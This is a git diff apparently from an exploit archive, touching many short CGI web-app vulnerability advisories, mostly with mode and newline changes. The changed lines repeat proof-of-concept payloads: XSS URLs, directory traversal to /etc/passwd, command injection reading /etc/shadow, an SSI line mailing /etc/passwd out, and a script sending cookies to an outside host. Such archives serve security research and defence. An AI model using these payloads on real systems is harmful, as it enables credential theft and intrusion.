end of file diff --git a/platforms/cgi/webapps/21435.txt b/platforms/cgi/webapps/21435.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21473.txt b/platforms/cgi/webapps/21473.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21480.txt b/platforms/cgi/webapps/21480.txt old mode 100755 new mode 100644 index b0c6c8f7c..78b1786ec --- a/platforms/cgi/webapps/21480.txt +++ b/platforms/cgi/webapps/21480.txt @@ -4,4 +4,4 @@ GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may co A user visiting the link will have the attacker's script code executed in their web browser in the context of the site running the vulnerable software. -http://target/mailman_directory/admin/ml-name?adminpw="></form><form/action="http://attackerhost/attackerscript.cgi"/method="post"><br \ No newline at end of file +http://target/mailman_directory/admin/ml-name?adminpw="></form><form/action="http://attackerhost/attackerscript.cgi"/method="post"><br \ No newline at end of file diff --git a/platforms/cgi/webapps/21494.txt b/platforms/cgi/webapps/21494.txt old mode 100755 new mode 100644 index d99225ee0..5461ab9f2 --- a/platforms/cgi/webapps/21494.txt +++ b/platforms/cgi/webapps/21494.txt @@ -6,4 +6,4 @@ A vulnerability has been reported in the csPassword.cgi script developed by CGIS http://target/csPassword.cgi?command=remove -This will cause csPassword to execute the remove() function. This function is not defined and thus will cause an error page to be displayed. \ No newline at end of file +This will cause csPassword to execute the remove() function. This function is not defined and thus will cause an error page to be displayed. \ No newline at end of file diff --git a/platforms/cgi/webapps/21495.txt b/platforms/cgi/webapps/21495.txt old mode 100755 new mode 100644 index a9d8cb8bc..8cb47e285 --- a/platforms/cgi/webapps/21495.txt +++ b/platforms/cgi/webapps/21495.txt @@ -6,4 +6,4 @@ A vulnerability has been reported in the csPassword.cgi script developed by CGIS javascript:void(document.form1.title.outerHTML="<textarea name=title>&lt;/textarea&gt;"); -Adding the javascript as part of the URL will change the text field into a textbox allowing users to enter newlines and other characters. \ No newline at end of file +Adding the javascript as part of the URL will change the text field into a textbox allowing users to enter newlines and other characters. \ No newline at end of file diff --git a/platforms/cgi/webapps/21532.txt b/platforms/cgi/webapps/21532.txt old mode 100755 new mode 100644 index a7ff772cd..d272e0d54 --- a/platforms/cgi/webapps/21532.txt +++ b/platforms/cgi/webapps/21532.txt @@ -6,4 +6,4 @@ Users with "public" access to the system may be able to view and modify some adm CSNews.cgi?database=default%2edb&command=showadv&mpage=manager -CSNews.cgi?command=manage&database=default%2edb&mpage=manager \ No newline at end of file +CSNews.cgi?command=manage&database=default%2edb&mpage=manager \ No newline at end of file diff --git a/platforms/cgi/webapps/21533.txt b/platforms/cgi/webapps/21533.txt old mode 100755 new mode 100644 index 5d6d778f0..42743fda9 --- a/platforms/cgi/webapps/21533.txt +++ b/platforms/cgi/webapps/21533.txt @@ -6,4 +6,4 @@ It is possible for a malicious admin user to bypass file type restrictions on th The ability to exploit this vulnerability may only require "public" access to csNews if used in conjunction with issues discussed in BID 4993. -javascript:alert(document.form1.pheader.value='setup.cgi'); \ No newline at end of file +javascript:alert(document.form1.pheader.value='setup.cgi'); \ No newline at end of file diff --git a/platforms/cgi/webapps/21535.txt b/platforms/cgi/webapps/21535.txt old mode 100755 new mode 100644 index a526e7ce3..2bd91c26a --- a/platforms/cgi/webapps/21535.txt +++ b/platforms/cgi/webapps/21535.txt @@ -8,4 +8,4 @@ Name: <!--#exec cmd="/bin/mail address@host < /etc/passwd"--> HTML Injection example: -Name: <img src="javascript:alert('test');"> \ No newline at end of file +Name: <img src="javascript:alert('test');"> \ No newline at end of file diff --git a/platforms/cgi/webapps/21553.txt b/platforms/cgi/webapps/21553.txt old mode 100755 new mode 100644 index 0a47826bd..c6424c509 --- a/platforms/cgi/webapps/21553.txt +++ b/platforms/cgi/webapps/21553.txt @@ -4,4 +4,4 @@ NetAuction does not filter HTML code from URI parameters, making it prone to cro http://www.xxxx.com/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search &Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('OopS');</script>& -Where=&Sort=Photo&Dir= \ No newline at end of file +Where=&Sort=Photo&Dir= \ No newline at end of file diff --git a/platforms/cgi/webapps/21558.txt b/platforms/cgi/webapps/21558.txt old mode 100755 new mode 100644 index 8ddd8b10d..4a8748551 --- a/platforms/cgi/webapps/21558.txt +++ b/platforms/cgi/webapps/21558.txt @@ -4,4 +4,4 @@ My Postcards is a commercial available eletronic postcard system. It is availabl The magiccard.cgi script does not properly handle some types of input. As a result, it may be possible for a remote user to specify the location of a specific file on the system hosting the My Postcards software. Upon specifying the location of a file that is readable by the web server process, the user could disclose the contents of the specified file. -http://www.example.com/cgi-bin/magiccard.cgi?pa=preview&next=custom&page=../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/cgi-bin/magiccard.cgi?pa=preview&next=custom&page=../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/cgi/webapps/21573.txt b/platforms/cgi/webapps/21573.txt old mode 100755 new mode 100644 index f5f43d96d..933bc4888 --- a/platforms/cgi/webapps/21573.txt +++ b/platforms/cgi/webapps/21573.txt @@ -6,4 +6,4 @@ YaBB fails to check URLs for the presence of script commands when generating err This issue may be exploited to steal cookie-based authentication credentials from legitimate users of YaBB. -http://some.site.com/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert()</script> \ No newline at end of file +http://some.site.com/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert()</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/21587.txt b/platforms/cgi/webapps/21587.txt old mode 100755 new mode 100644 index c9b3191b3..8142dbd3d --- a/platforms/cgi/webapps/21587.txt +++ b/platforms/cgi/webapps/21587.txt @@ -4,4 +4,4 @@ Betsie (BBC Education Text to Speech Internet Enhancer) is prone to a cross-site Attackers may exploit this condition via a malicious link to a site running the vulnerable software. Successful exploitation will enable an attacker to cause script code to be executed in the web browser of a user who visits the malicious link. -http://server/cgi-bin/betsie/parserl.pl/<script>alert("eek!")</script> \ No newline at end of file +http://server/cgi-bin/betsie/parserl.pl/<script>alert("eek!")</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/21588.txt b/platforms/cgi/webapps/21588.txt old mode 100755 new mode 100644 index b49972c74..2abb39bda --- a/platforms/cgi/webapps/21588.txt +++ b/platforms/cgi/webapps/21588.txt @@ -6,4 +6,4 @@ Attackers may exploit this condition via a malicious link to a site running the It has been reported that there other instances where Blackboard fails to sanitize arbitrary HTML and script code. -http://target/bin/login.pl?course_id=">&lt;SCRIPT&gt;alert()&lt;/SCRIPT&gt; \ No newline at end of file +http://target/bin/login.pl?course_id=">&lt;SCRIPT&gt;alert()&lt;/SCRIPT&gt; \ No newline at end of file diff --git a/platforms/cgi/webapps/21609.txt b/platforms/cgi/webapps/21609.txt old mode 100755 new mode 100644 index 2175e64c9..9f5ba5046 --- a/platforms/cgi/webapps/21609.txt +++ b/platforms/cgi/webapps/21609.txt @@ -4,4 +4,4 @@ Fluid Dynamics Search Engine is a search application for local and remote web si It is possible for attackers to construct a URL that will cause scripting code to be embedded in a search results page. As a result, when an innocent user follows such a link, the script code will execute within the context of the hosted site. -http://www.xav.com/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&Rank=<br><h1>XSS</h1> \ No newline at end of file +http://www.xav.com/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&Rank=<br><h1>XSS</h1> \ No newline at end of file diff --git a/platforms/cgi/webapps/21617.txt b/platforms/cgi/webapps/21617.txt old mode 100755 new mode 100644 index 3d4ec4ca8..532f85fd8 --- a/platforms/cgi/webapps/21617.txt +++ b/platforms/cgi/webapps/21617.txt @@ -6,4 +6,4 @@ A vulnerability has been reported in the IMHO Roxen webmail module which may ena - Logout - Goto URL : (((webmail_URL)))/(old_error,plain)/mail/error?error=1 -This will cause the webserver to display a REFERER. This REFERER may be submitted to access another user's session. \ No newline at end of file +This will cause the webserver to display a REFERER. This REFERER may be submitted to access another user's session. \ No newline at end of file diff --git a/platforms/cgi/webapps/21658.html b/platforms/cgi/webapps/21658.html old mode 100755 new mode 100644 index 7baae9561..db7ad2137 --- a/platforms/cgi/webapps/21658.html +++ b/platforms/cgi/webapps/21658.html @@ -17,4 +17,4 @@ Please type your messages in here. </tr> </FORM> </table> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/cgi/webapps/21659.html b/platforms/cgi/webapps/21659.html old mode 100755 new mode 100644 index d1c332ca1..893f9ac18 --- a/platforms/cgi/webapps/21659.html +++ b/platforms/cgi/webapps/21659.html @@ -11,4 +11,4 @@ Open Administration Guestbook: <input type="submit" value="Back to Admin" name=" nt-weight: bold"> </form> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/cgi/webapps/21679.txt b/platforms/cgi/webapps/21679.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21728.txt b/platforms/cgi/webapps/21728.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21729.txt b/platforms/cgi/webapps/21729.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21730.txt b/platforms/cgi/webapps/21730.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21768.txt b/platforms/cgi/webapps/21768.txt old mode 100755 new mode 100644 index a27c542c6..020a229f8 --- a/platforms/cgi/webapps/21768.txt +++ b/platforms/cgi/webapps/21768.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this condition to execute arbitrary commands on th Simple Site Searcher, released by the same vendor, is also prone to this issue. -http://target/searchenginepath/site_searcher.cgi?page=|command| \ No newline at end of file +http://target/searchenginepath/site_searcher.cgi?page=|command| \ No newline at end of file diff --git a/platforms/cgi/webapps/21769.txt b/platforms/cgi/webapps/21769.txt old mode 100755 new mode 100644 index 6c7893199..f49864e52 --- a/platforms/cgi/webapps/21769.txt +++ b/platforms/cgi/webapps/21769.txt @@ -8,4 +8,4 @@ It is possible to create a malicious link to the server which will generate an e http://www.example.com/pages/htmlos/%3Cscript%3Ealert(document.domain);%3C/script%3E http://www.example.com/cgi-bin/erba/start/%3Cscript%3Ealert(document.domain);%3C/script%3E -http://www.exmaple.com/cgi-bin/start.cgi/%3Cscript%3Ealert(document.domain);%3C/script%3E \ No newline at end of file +http://www.exmaple.com/cgi-bin/start.cgi/%3Cscript%3Ealert(document.domain);%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/21802.txt b/platforms/cgi/webapps/21802.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21877.txt b/platforms/cgi/webapps/21877.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21878.txt b/platforms/cgi/webapps/21878.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21895.txt b/platforms/cgi/webapps/21895.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21926.txt b/platforms/cgi/webapps/21926.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21962.txt b/platforms/cgi/webapps/21962.txt old mode 100755 new mode 100644 index ba0fd8bfc..a9e86ee4c --- a/platforms/cgi/webapps/21962.txt +++ b/platforms/cgi/webapps/21962.txt @@ -6,4 +6,4 @@ As a result, it is possible for a remote attacker to create a malicious link con This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software. -http://www.example.com/cgi-bin/mojo/mojo.cgi?flavor=subscribe&email=%3Cscript%3Ealert%28%22XSS%20Vuln.%22%29%3C%2Fscript%3E&list=skazat_design_newsletter&submit=Submit \ No newline at end of file +http://www.example.com/cgi-bin/mojo/mojo.cgi?flavor=subscribe&email=%3Cscript%3Ealert%28%22XSS%20Vuln.%22%29%3C%2Fscript%3E&list=skazat_design_newsletter&submit=Submit \ No newline at end of file diff --git a/platforms/cgi/webapps/21966.txt b/platforms/cgi/webapps/21966.txt old mode 100755 new mode 100644 index f856e0338..177dea041 --- a/platforms/cgi/webapps/21966.txt +++ b/platforms/cgi/webapps/21966.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6055/info A vulnerability exists in Mailreader.com which may enable remote attackers to disclose the contents of arbitrary webserver readable files. An attacker may exploit this issue by submitting a malicious web request containing dot-dot-slash (../) directory traversal sequences. The request must be for a known resource, and the file request must be appended by a null byte (%00). -http://www.example.com/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/cgi/webapps/21979.txt b/platforms/cgi/webapps/21979.txt old mode 100755 new mode 100644 index 6b36530e7..67705b8ab --- a/platforms/cgi/webapps/21979.txt +++ b/platforms/cgi/webapps/21979.txt @@ -12,4 +12,4 @@ It is not yet known which ION Script packages are vulnerable to this issue. http://www.example.com/cgi-bin/ion-p.exe?page=c:\winnt\repair\sam -http://www.example.com/cgi-bin/ion-p?page=../../../../../etc/hosts \ No newline at end of file +http://www.example.com/cgi-bin/ion-p?page=../../../../../etc/hosts \ No newline at end of file diff --git a/platforms/cgi/webapps/21995.txt b/platforms/cgi/webapps/21995.txt old mode 100755 new mode 100644 index b7f0c2a3e..30a33a84d --- a/platforms/cgi/webapps/21995.txt +++ b/platforms/cgi/webapps/21995.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6127/info It has been reported that the default configuration of CuteCast is insecure. According to the report, CuteCast stores user information in a publicly accessible directory. This includes plaintext credentials. -http://www.example.com/cgi-bin/cutecast/members/<username>.user \ No newline at end of file +http://www.example.com/cgi-bin/cutecast/members/<username>.user \ No newline at end of file diff --git a/platforms/cgi/webapps/22015.txt b/platforms/cgi/webapps/22015.txt old mode 100755 new mode 100644 index f8a6fd2c1..206fa7691 --- a/platforms/cgi/webapps/22015.txt +++ b/platforms/cgi/webapps/22015.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6170/info Versions of W3Mail 1.0.6 and greater are susceptible to a file disclosure vulnerability. To view attachments, the script "viewAttachment.cgi" accepts the parameter "file". The value of this parameter is passed to the open() function as the filename argument without being sanitized. Attackers may cause any file on the filesystem to open by specifying its relative path using directory traversal characters. -viewAttachment.cgi?file=../../../../../etc/passwd \ No newline at end of file +viewAttachment.cgi?file=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/cgi/webapps/22045.txt b/platforms/cgi/webapps/22045.txt old mode 100755 new mode 100644 index bb3f4c6e8..cb65838fa --- a/platforms/cgi/webapps/22045.txt +++ b/platforms/cgi/webapps/22045.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/6253/info The ext.dll ISAPI does not sufficiently sanitize user-supplied input when processing search queries. This may allow an attacker to create a custom URL containing script code that, when viewed in a browser by a legitimate user, will result in the execution of the script code. ');alert(document.cookie);// -')" style="left:expression(eval('alert(document.cookie)'))"> \ No newline at end of file +')" style="left:expression(eval('alert(document.cookie)'))"> \ No newline at end of file diff --git a/platforms/cgi/webapps/22050.txt b/platforms/cgi/webapps/22050.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22051.txt b/platforms/cgi/webapps/22051.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22052.txt b/platforms/cgi/webapps/22052.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22137.txt b/platforms/cgi/webapps/22137.txt old mode 100755 new mode 100644 index e7967cf6f..9c96ee912 --- a/platforms/cgi/webapps/22137.txt +++ b/platforms/cgi/webapps/22137.txt @@ -6,4 +6,4 @@ The FormMail-clone script does not sufficiently sanitize HTML tags and script co This vulnerability was originally reported in FormMail. Additional reports have indicated that the issue actually exists in FormMail-clone, which is an entirely different program which is designed to perform the same function as FormMail but contains none of the original code. -http://www.example.com/cgi-sys/FormMail.cgi?<script>alert("test");</script> \ No newline at end of file +http://www.example.com/cgi-sys/FormMail.cgi?<script>alert("test");</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/22169.pl b/platforms/cgi/webapps/22169.pl index bb2786d36..9f3d119b0 100755 --- a/platforms/cgi/webapps/22169.pl +++ b/platforms/cgi/webapps/22169.pl @@ -129,5 +129,4 @@ be somewhere in the html output\n"; print $recv; print "the above is received from the server, if you have a 404 or 403, theres somethin wrong if not, and no command output, try again.. - if command ouput buggy, convert \\v to \\n with tr\n"; - \ No newline at end of file + if command ouput buggy, convert \\v to \\n with tr\n"; \ No newline at end of file diff --git a/platforms/cgi/webapps/22198.txt b/platforms/cgi/webapps/22198.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22199.txt b/platforms/cgi/webapps/22199.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22204.txt b/platforms/cgi/webapps/22204.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22227.txt b/platforms/cgi/webapps/22227.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22228.txt b/platforms/cgi/webapps/22228.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22260.c b/platforms/cgi/webapps/22260.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22261.pl b/platforms/cgi/webapps/22261.pl index 5c7a81cbc..bc5288e0b 100755 --- a/platforms/cgi/webapps/22261.pl +++ b/platforms/cgi/webapps/22261.pl @@ -28,4 +28,4 @@ if ($response->code == 200){ else { print "The command could not be sent.\n"; - } \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/cgi/webapps/22337.txt b/platforms/cgi/webapps/22337.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22364.c b/platforms/cgi/webapps/22364.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22377.txt b/platforms/cgi/webapps/22377.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22408.txt b/platforms/cgi/webapps/22408.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22481.txt b/platforms/cgi/webapps/22481.txt old mode 100755 new mode 100644 index f153a13b3..bbd4f0356 --- a/platforms/cgi/webapps/22481.txt +++ b/platforms/cgi/webapps/22481.txt @@ -4,4 +4,4 @@ Super Guestbook has been reported prone to a sensitive information disclosure we An attacker may disclose sensitive information regarding the Super Guestbook install by sending a HTTP request for a Guest Book configuration file. Details including administration credentials are displayed in the attackers browser. -http://www.example.com/cgi-bin/SGB_DIR/superguestconfig \ No newline at end of file +http://www.example.com/cgi-bin/SGB_DIR/superguestconfig \ No newline at end of file diff --git a/platforms/cgi/webapps/22482.txt b/platforms/cgi/webapps/22482.txt old mode 100755 new mode 100644 index fb92aaa72..6f846973b --- a/platforms/cgi/webapps/22482.txt +++ b/platforms/cgi/webapps/22482.txt @@ -4,4 +4,4 @@ Guestbook has been reported prone to a sensitive information disclosure weakness An attacker may disclose sensitive information regarding the Super Guestbook install by sending a HTTP request for the Guest Book passwd file. Administration credentials are displayed in the attacker's browser. -http://www.example.com/cgi-bin/guestbook/passwd \ No newline at end of file +http://www.example.com/cgi-bin/guestbook/passwd \ No newline at end of file diff --git a/platforms/cgi/webapps/22588.txt b/platforms/cgi/webapps/22588.txt old mode 100755 new mode 100644 index ce7293983..78df20918 --- a/platforms/cgi/webapps/22588.txt +++ b/platforms/cgi/webapps/22588.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7557/info IT has been reported that Happymall E-Commerce is prone to cross-site scripting attacks. The problem occurs due to insufficient sanitization of user-supplied URI parameters. As a result, it may be possible for an attacker to execute arbitrary script code within the browser of a legitimate user visiting the site. -http://www.target.com/shop/normal_html.cgi?file=<script>alert("XSS")</script> \ No newline at end of file +http://www.target.com/shop/normal_html.cgi?file=<script>alert("XSS")</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/22592.txt b/platforms/cgi/webapps/22592.txt old mode 100755 new mode 100644 index 72a2e5145..c2d69b7e3 --- a/platforms/cgi/webapps/22592.txt +++ b/platforms/cgi/webapps/22592.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7559/info IT has been reported that Happymall E-Commerce is prone to a file disclosure vulnerability. The problem occurs due to insufficient sanitization of user-supplied URI parameters. As a result, it may be possible for an attacker to view the contents of sensitive system files. Files viewed in this manner would be accessed with the privileges of the Happymall process. -http://www.target.org/shop/normal_html.cgi?file=../../../../../../etc/issue%00 \ No newline at end of file +http://www.target.org/shop/normal_html.cgi?file=../../../../../../etc/issue%00 \ No newline at end of file diff --git a/platforms/cgi/webapps/2266.txt b/platforms/cgi/webapps/2266.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22669.txt b/platforms/cgi/webapps/22669.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/2267.txt b/platforms/cgi/webapps/2267.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22688.txt b/platforms/cgi/webapps/22688.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22689.txt b/platforms/cgi/webapps/22689.txt old mode 100755 new mode 100644 index 51f80d9e4..f2d85737e --- a/platforms/cgi/webapps/22689.txt +++ b/platforms/cgi/webapps/22689.txt @@ -4,4 +4,4 @@ A remote file include vulnerability has been reported for P-Synch. Due to insuff An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for a specific URI parameter. -https://path/to/psynch/nph-psa.exe?css=http://somesite/file \ No newline at end of file +https://path/to/psynch/nph-psa.exe?css=http://somesite/file \ No newline at end of file diff --git a/platforms/cgi/webapps/22692.txt b/platforms/cgi/webapps/22692.txt old mode 100755 new mode 100644 index cd0c20b9e..f1284bdbd --- a/platforms/cgi/webapps/22692.txt +++ b/platforms/cgi/webapps/22692.txt @@ -12,4 +12,4 @@ http://<target>:9090/apps/web/vs_diag.cgi?server=<script>function%20pedo() ();xmlDoc=xmlHttp.responseText;document.write(xmlDoc);}pedo();alert("Have% 20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip% 20this%20info!%20Much%20more%20evil%20actions%20are%20possible...") -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/22743.txt b/platforms/cgi/webapps/22743.txt old mode 100755 new mode 100644 index fad01753d..55ea0166e --- a/platforms/cgi/webapps/22743.txt +++ b/platforms/cgi/webapps/22743.txt @@ -8,4 +8,4 @@ Successful exploitation may expose sensitive information to remote attackers. Th http://www.samplesite.com/cgi-bin/imagefolio/admin/admin.cgi?cgi=remove. pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../. -./etc/ \ No newline at end of file +./etc/ \ No newline at end of file diff --git a/platforms/cgi/webapps/22770.txt b/platforms/cgi/webapps/22770.txt old mode 100755 new mode 100644 index 421821710..1fcfb6c36 --- a/platforms/cgi/webapps/22770.txt +++ b/platforms/cgi/webapps/22770.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7910/info Infinity CGI Exploit Scanner is reported to be prone to a cross-site scripting vulnerability. An attacker could exploit this issue to creating a malicious link to a site hosting the software that contains hostile HTML and script code. If this link is visited by a web user, the attacker-supplied code could be interpreted in their browser. -http://www.example.com/cgi-bin/nph-exploitscanget.cgi?host=%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E&port=80&idsbypass=0&errchk=1 \ No newline at end of file +http://www.example.com/cgi-bin/nph-exploitscanget.cgi?host=%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E&port=80&idsbypass=0&errchk=1 \ No newline at end of file diff --git a/platforms/cgi/webapps/22772.txt b/platforms/cgi/webapps/22772.txt old mode 100755 new mode 100644 index f172edf05..37b9feb18 --- a/platforms/cgi/webapps/22772.txt +++ b/platforms/cgi/webapps/22772.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/7913/info Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process. http://www.example.com/cgi-bin/nph-exploitscanget.cgi?host=`cat%20/etc/passwd`` -cat%20/etc/shadow`&port=80&errchk=0&idsbypass=0 \ No newline at end of file +cat%20/etc/shadow`&port=80&errchk=0&idsbypass=0 \ No newline at end of file diff --git a/platforms/cgi/webapps/22777.txt b/platforms/cgi/webapps/22777.txt old mode 100755 new mode 100644 index 708f480ef..c475857d0 --- a/platforms/cgi/webapps/22777.txt +++ b/platforms/cgi/webapps/22777.txt @@ -4,4 +4,4 @@ It has been reported that LedNews does not properly filter input from news posts <script> document.location.replace('http://www.example.com/cgi-bin/cookiemonster.cgi?'+document.cookie); -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/22799.txt b/platforms/cgi/webapps/22799.txt old mode 100755 new mode 100644 index 85ab63044..fbc0c94c8 --- a/platforms/cgi/webapps/22799.txt +++ b/platforms/cgi/webapps/22799.txt @@ -6,4 +6,4 @@ An attacker may exploit this vulnerability by enticing a victim user to follow a It should be noted that although this vulnerability has been reported to affect Kerio MailServer version 5.6.3, previous versions might also be affected. -http://www.example.com/add_acl?folder=~conde0@localhost/INBOX&add_name=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/add_acl?folder=~conde0@localhost/INBOX&add_name=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/22804.txt b/platforms/cgi/webapps/22804.txt old mode 100755 new mode 100644 index 724784774..d90685d13 --- a/platforms/cgi/webapps/22804.txt +++ b/platforms/cgi/webapps/22804.txt @@ -6,4 +6,4 @@ An attacker may exploit this vulnerability by enticing a victim user to follow a It should be noted that although this vulnerability has been reported to affect Kerio MailServer version 5.6.3, previous versions might also be affected. -http://www.example.com/do_map?action=new&oldalias=eso&alias=<script>alert(document.cookie);</script>&folder=public&user=lucascavadora \ No newline at end of file +http://www.example.com/do_map?action=new&oldalias=eso&alias=<script>alert(document.cookie);</script>&folder=public&user=lucascavadora \ No newline at end of file diff --git a/platforms/cgi/webapps/22843.txt b/platforms/cgi/webapps/22843.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/22963.txt b/platforms/cgi/webapps/22963.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23021.txt b/platforms/cgi/webapps/23021.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23025.txt b/platforms/cgi/webapps/23025.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23059.txt b/platforms/cgi/webapps/23059.txt old mode 100755 new mode 100644 index 10f59f97a..49cd8b753 --- a/platforms/cgi/webapps/23059.txt +++ b/platforms/cgi/webapps/23059.txt @@ -4,4 +4,4 @@ A vulnerability has been reported in Netbula Anyboard that may allow a remote at This vulnerability may allow an attack to gather sensitive information in order to launch further attacks against a vulnerable system. -http://www.example.com/cgi-bin/anyboard.cgi/?cmd=sinfo&all=1 \ No newline at end of file +http://www.example.com/cgi-bin/anyboard.cgi/?cmd=sinfo&all=1 \ No newline at end of file diff --git a/platforms/cgi/webapps/23085.html b/platforms/cgi/webapps/23085.html old mode 100755 new mode 100644 index 99e335dbf..5f380a21a --- a/platforms/cgi/webapps/23085.html +++ b/platforms/cgi/webapps/23085.html @@ -13,4 +13,4 @@ value="../../../../../../../../../../etc/passwd"> <p><input type="submit" name="action" value="Yes - Use Advanced Editor"> <p><input type="submit" value="Return to Site Builder"> </form> -</center></body></html> \ No newline at end of file +</center></body></html> \ No newline at end of file diff --git a/platforms/cgi/webapps/23127.txt b/platforms/cgi/webapps/23127.txt old mode 100755 new mode 100644 index c19181f0a..e88629c09 --- a/platforms/cgi/webapps/23127.txt +++ b/platforms/cgi/webapps/23127.txt @@ -5,4 +5,4 @@ A cross-site scripting vulnerability has been reported for Escapade. The vulnera An attacker could exploit this issue to execute arbitrary HTML code in the browser of a remote user who follows a malicious link. Code execution would occur in the context of the vulnerable site. It has also been reported that this issue may be exploited to disclose the installation path of the affected software. http://www.example.com/cgi-bin/esp?PAGE=<script>alert(document.domain) -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/23128.txt b/platforms/cgi/webapps/23128.txt old mode 100755 new mode 100644 index fd335ae0f..70d7f8f6e --- a/platforms/cgi/webapps/23128.txt +++ b/platforms/cgi/webapps/23128.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8574/info Escapade is prone to a path disclosure vulnerability. It is possible to gain access to sensitive path information by issuing a request for an invalid resource, passed as a value for the PAGE parameter to the Escapade Scripting Engine. -http://www.site.com/cgi-bin/esp?PAGE=!@#$% \ No newline at end of file +http://www.site.com/cgi-bin/esp?PAGE=!@#$% \ No newline at end of file diff --git a/platforms/cgi/webapps/23153.txt b/platforms/cgi/webapps/23153.txt old mode 100755 new mode 100644 index 9ab1a4dd9..4d9b93447 --- a/platforms/cgi/webapps/23153.txt +++ b/platforms/cgi/webapps/23153.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8637/info A cross-site scripting problem has been reported in NetWin DBabble. This could make it possible for an attacker to potentially execute code in the security context of a site using the vulnerable software. This could be exploited by enticing a user to follow a malicious link to a site hosting the software. -http://www.example.com/dbabble?cmd="><evil_script> \ No newline at end of file +http://www.example.com/dbabble?cmd="><evil_script> \ No newline at end of file diff --git a/platforms/cgi/webapps/23214.txt b/platforms/cgi/webapps/23214.txt old mode 100755 new mode 100644 index 562667fa8..c1b3d7ced --- a/platforms/cgi/webapps/23214.txt +++ b/platforms/cgi/webapps/23214.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8757/info A problem with message.cgi script used by Cobalt RaQ appliances could lead to cross-site scripting. This could result in attacks attempting to steal authentication information. 